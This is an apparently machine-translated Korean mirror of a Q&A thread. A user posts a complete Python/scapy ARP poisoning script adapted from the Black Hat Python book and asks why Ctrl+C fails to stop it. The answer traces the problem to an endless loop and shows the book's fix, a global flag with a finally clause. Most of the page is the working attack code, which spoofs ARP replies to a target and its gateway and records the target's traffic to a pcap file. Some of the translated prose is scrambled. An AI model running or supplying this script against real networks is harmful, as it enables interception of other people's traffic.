2. 질의 응답
  3. ArpPisoning with Python, BlackHat Book

ArpPisoning with Python, BlackHat Book

2016-10-28 2 views
0

나는 blackhat python 책을 기반으로 arppoisoning 프로그램을 작성하려고 시도했다. 그리고 잘 작동하고 모든 것은 greate로 작동하지만 Ctrl + C를 사용하여 프로그램을 중지하려는 경우 keybordinterrupt 예외가 작동하지 않습니다! 나는 복원 대상이 2 회 표시되므로 "복원 대상 [대상]"이 2 회 표시되므로 복원 대상이 2 회 실행됩니다! 저도 같은 문제를 겪고,ArpPisoning with Python, BlackHat Book

from scapy.all import * 
import os 
import sys 
import threading 
import signal 


interface = raw_input("Enter Interface name :> ") 
target_ip = "192.168.43.180" 
gateway_ip = "192.168.43.1" 
packet_count = 10 

conf.iface = interface 
conf.verb = 0 

def restore_target(gateway_ip,gateway_mac,target_ip,target_mac): 
    print "[*] Restoring Target..." 
    send(ARP(op=2,psrc=gateway_ip,pdst=target_ip,hwdst="ff:ff:ff:ff:ff:ff",hwsrc=gateway_mac),count=5) 
    send(ARP(op=2,psrc=target_ip,pdst=gateway_ip,hwdst="ff:ff:ff:ff:ff:ff",hwsrc=target_mac),count=5) 
    os.kill(os.getpid(),signal.SIGINT) 

def get_mac(ip_address): 
    responses , unanswered = srp(Ether(dst="ff:ff:ff:ff:ff:ff")/ARP(pdst=ip_address),timeout=2,retry=10) 
    for s,r in responses : 
     return r[Ether].src 
    return None 

def poison_target(gateway_ip,gateway_mac,target_ip,target_mac): 
    poison_target = ARP() 
    poison_target.op = 2 
    poison_target.psrc = gateway_ip 
    poison_target.pdst = target_ip 
    poison_target.hwdst = target_mac 

    poison_gateway = ARP() 
    poison_gateway.op = 2 
    poison_gateway.psrc = target_ip 
    poison_gateway.pdst = gateway_ip 
    poison_gateway.hwdst = gateway_mac 

    print "[*] Begining ARP Poisoning:" 
    while True: 
      send(poison_target) 
      send(poison_gateway) 
      time.sleep(2) 

    print ".:ARP poison Attack Finished:." 
    return 


print ".: Setting Up %s :." % interface 
gateway_mac = get_mac(gateway_ip) 

if gateway_mac is None: 
    print "Failed to Get Gateway MAC..." 
    sys.exit(0) 
else: 
    print "[*] Gateway %s is at %s" %(gateway_ip,gateway_mac) 
target_mac= get_mac(target_ip) 

if target_mac is None: 
    print "[!!!] Failed to get target MAC. Exiting." 
    sys.exit(0) 
else: 
    print "[*] Target %s is at %s" % (target_ip,target_mac) 

poison_thread = threading.Thread(target = poison_target,args=(gateway_ip,gateway_mac,target_ip,target_mac)) 
poison_thread.start() 

try: 
    print " \n[*] Start snifing for %d Packets \n" %packet_count 
    bpf_filter = "ip host %s" % target_ip 
    packets = sniff(count=packet_count,filter=bpf_filter,iface=interface) 
    wrpcap('arper.pcap',packets) 
    restore_target(gateway_ip, gateway_mac, target_ip, target_mac) 
except KeyboardInterrupt: 
    restore_target(gateway_ip,gateway_mac,target_ip,target_mac) 
    sys.exit(0)

출처

2016-10-28 Ali mjz

+1

는 왜, CTRL + 브레이크를 사용하지 않는 : 주요 코드에서 다음

def poison_target(gateway_ip, gateway_mac, target_ip, target_mac): '''poison''' global poisoning --snip-- print '[*] Begining the ARP poison. [CTRL-C to stop]' while poisoning: send(poison_t) send(poison_g) time.sleep(2) print '[*] ARP poison attack finished.' return

: 특히, 저자는 세계적인 poisoning 및 주요 오류 처리에 finally 절을 사용 키보드 중단 이벤트? – dannyxn

+0

내 프로그램이 restoretarget 메소드에 도달하면 문제가되지 않으며 os.kill (os.getpid(), signal.SIGINT)에 오류가 표시됩니다! –

답변

1

확인 : 여기 내 전체 코드입니다.

이 루프는 poison_target 함수의 while True 루프입니다.이 루프는 종료되지 않습니다.

다운로드 가능한 코드를 검토 한 후에 책의 코드와 약간의 차이가 있음을 알 수 있습니다. 대신 만드는

--snip-- 
poisoning = True 
poison_thread.start() 
try: 
    --snip-- 
    packets = sniff(count=count, filter=bpf_filter, iface=interface) 
except KeyboardInterrupt: 
    pass 
finally: 
    --snip-- 
    poisoning = False 

    time.sleep(2) 

    restore_target(gateway_ip, gateway_mac, target_ip, target_mac) 
    --snip--

출처

2016-12-28 01:18:01 Anon

 관련 문제

  • 관련 문제 없음^_^